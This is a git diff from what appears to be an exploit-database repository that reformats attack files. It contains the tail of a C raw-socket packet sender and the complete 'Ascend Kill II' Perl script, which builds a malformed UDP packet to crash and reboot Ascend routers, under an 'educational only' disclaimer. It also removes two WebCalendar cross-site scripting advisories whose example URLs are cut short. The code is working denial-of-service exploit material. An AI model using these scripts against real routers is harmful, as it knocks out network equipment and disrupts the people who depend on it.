(he->h_addr_list == NULL)) + return 0; - bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); - } - return (addr); - } + bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list)); + } + return (addr); +} - void - main (argc, argv) - int argc; - char **argv; - { - unsigned int saddr, daddr; - struct sockaddr_in sin; - int s, i; +void +main (argc, argv) + int argc; + char **argv; +{ + unsigned int saddr, daddr; + struct sockaddr_in sin; + int s, i; - if (argc != 3) - errs ("Usage: %s \n", argv[0]); + if (argc != 3) + errs ("Usage: %s \n", argv[0]); - if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) - err ("Unable to open raw socket.\n"); - if (!(saddr = lookup (argv[1]))) - err ("Unable to lookup source address.\n"); - if (!(daddr = lookup (argv[2]))) - err ("Unable to lookup destination address.\n"); - sin.sin_family = AF_INET; - sin.sin_port = 9; - sin.sin_addr.s_addr = daddr; - if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) - { - perror ("sendpkt_udp"); - err ("Error sending the UDP packet.\n"); - } - } \ No newline at end of file + if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) + err ("Unable to open raw socket.\n"); + if (!(saddr = lookup (argv[1]))) + err ("Unable to lookup source address.\n"); + if (!(daddr = lookup (argv[2]))) + err ("Unable to lookup destination address.\n"); + sin.sin_family = AF_INET; + sin.sin_port = 9; + sin.sin_addr.s_addr = daddr; + if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1) + { + perror ("sendpkt_udp"); + err ("Error sending the UDP packet.\n"); + } +} \ No newline at end of file diff --git a/platforms/hardware/dos/20332.pl b/platforms/hardware/dos/20332.pl index 0d968df1c..eff1b7e88 100755 --- a/platforms/hardware/dos/20332.pl +++ b/platforms/hardware/dos/20332.pl @@ -1,64 +1,66 @@ -source: http://www.securityfocus.com/bid/1855/info - -A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. - -Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable. +# +#source: http://www.securityfocus.com/bid/1855/info +# +#A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 #or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. +# +#Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable. +# #!/usr/bin/perl - # - # Ascend Kill II - perl version - # (C) 1998 Rootshell - http://www.rootshell.com/ - - # - # Released: 3/17/98 - # - # Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues - # (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) - # - # NOTE: This program is NOT to be used for malicous purposes. This is - # intenteded for educational purposes only. By using this program - # you agree to use this for lawfull purposes ONLY. - # - # +# +# Ascend Kill II - perl version +# (C) 1998 Rootshell - http://www.rootshell.com/ - +# +# Released: 3/17/98 +# +# Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues +# (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) +# +# NOTE: This program is NOT to be used for malicous purposes. This is +# intenteded for educational purposes only. By using this program +# you agree to use this for lawfull purposes ONLY. +# +# - use Socket; +use Socket; - require "getopts.pl"; +require "getopts.pl"; - sub AF_INET {2;} - sub SOCK_DGRAM {2;} +sub AF_INET {2;} +sub SOCK_DGRAM {2;} - sub ascend_kill { - $remotehost = shift(@_); - chop($hostname = `hostname`); - $port = 9; - $SIG{'INT'} = 'dokill'; - $sockaddr = 'S n a4 x8'; - ($pname, $aliases, $proto) = getprotobyname('tcp'); - ($pname, $aliases, $port) = getservbyname($port, 'tcp') - unless $port =~ /^\d+$/; - ($pname, $aliases, $ptype, $len, $thisaddr) = - gethostbyname($hostname); - $this = pack($sockaddr, AF_INET, 0, $thisaddr); - ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost); - $that = pack($sockaddr, AF_INET, $port, $thataddr); - socket(S, &AF_INET, &SOCK_DGRAM, 0); - $msg = pack("c64", - 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, - 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, - 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, - 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, - 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, - 0x50, 0x41, 0x53, 0x53); - for ($i=0; $i<500; $i++) { - $msg .= pack("c1", 0xff); - } - send(S,$msg,0,$that) || die "send:$!"; - } +sub ascend_kill { + $remotehost = shift(@_); + chop($hostname = `hostname`); + $port = 9; + $SIG{'INT'} = 'dokill'; + $sockaddr = 'S n a4 x8'; + ($pname, $aliases, $proto) = getprotobyname('tcp'); + ($pname, $aliases, $port) = getservbyname($port, 'tcp') + unless $port =~ /^\d+$/; + ($pname, $aliases, $ptype, $len, $thisaddr) = + gethostbyname($hostname); + $this = pack($sockaddr, AF_INET, 0, $thisaddr); + ($pname, $aliases, $ptype, $len, $thataddr) = gethostbyname($remotehost); + $that = pack($sockaddr, AF_INET, $port, $thataddr); + socket(S, &AF_INET, &SOCK_DGRAM, 0); + $msg = pack("c64", + 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, + 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, + 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, + 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, + 0x50, 0x41, 0x53, 0x53); + for ($i=0; $i<500; $i++) { + $msg .= pack("c1", 0xff); + } + send(S,$msg,0,$that) || die "send:$!"; +} - if ($ARGV[0] eq '') { - print "usage: akill2.pl \n"; - exit; - } +if ($ARGV[0] eq '') { + print "usage: akill2.pl \n"; + exit; +} - &ascend_kill($ARGV[0]); \ No newline at end of file +&ascend_kill($ARGV[0]); \ No newline at end of file diff --git a/platforms/php/webapps/23097.txt b/platforms/php/webapps/23097.txt deleted file mode 100755 index 59c83e47e..000000000 --- a/platforms/php/webapps/23097.txt +++ /dev/null @@ -1,7 +0,0 @@ -source: http://www.securityfocus.com/bid/8539/info - -It has been reported that WebCalendar is prone to multiple cross-site scripting vulnerabilites in various modules. The issues exist in includes/js/colors.php, week.php, day.php, month.php, week_details.php, view_l.php, view_m.php, view_t.php, view_v.php, view_w.php, and week_details.php modules of the software. The vulneabilities may allow an attacker to create a malicious link containing HTML or sciprt code that may be rendered in a user's browser. - -Successful Exploitation of this issue may allow an attacker to steal cookie-based credentials. Other attacks may well be possible. - -http://www.example.com/webcalendar/colors.php?color= \ No newline at end of file diff --git a/platforms/php/webapps/23098.txt b/platforms/php/webapps/23098.txt deleted file mode 100755 index db9e57204..000000000 --- a/platforms/php/webapps/23098.txt +++ /dev/null @@ -1,9 +0,0 @@ -source: http://www.securityfocus.com/bid/8539/info - -It has been reported that WebCalendar is prone to multiple cross-site scripting vulnerabilites in various modules. The issues exist in includes/js/colors.php, week.php, day.php, month.php, week_details.php, view_l.php, view_m.php, view_t.php, view_v.php, view_w.php, and week_details.php modules of the software. The vulneabilities may allow an attacker to create a malicious link containing HTML or sciprt code that may be rendered in a user's browser. - -Successful Exploitation of this issue may allow an attacker to steal cookie-based credentials. Other attacks may well be possible. - -http://www.example.com/webcalendar/week.php?user="> -http://www.example.com/webcalendar/week.php?eventinfo= -http://www.example.com/webcalendar/week.php?eventinfo=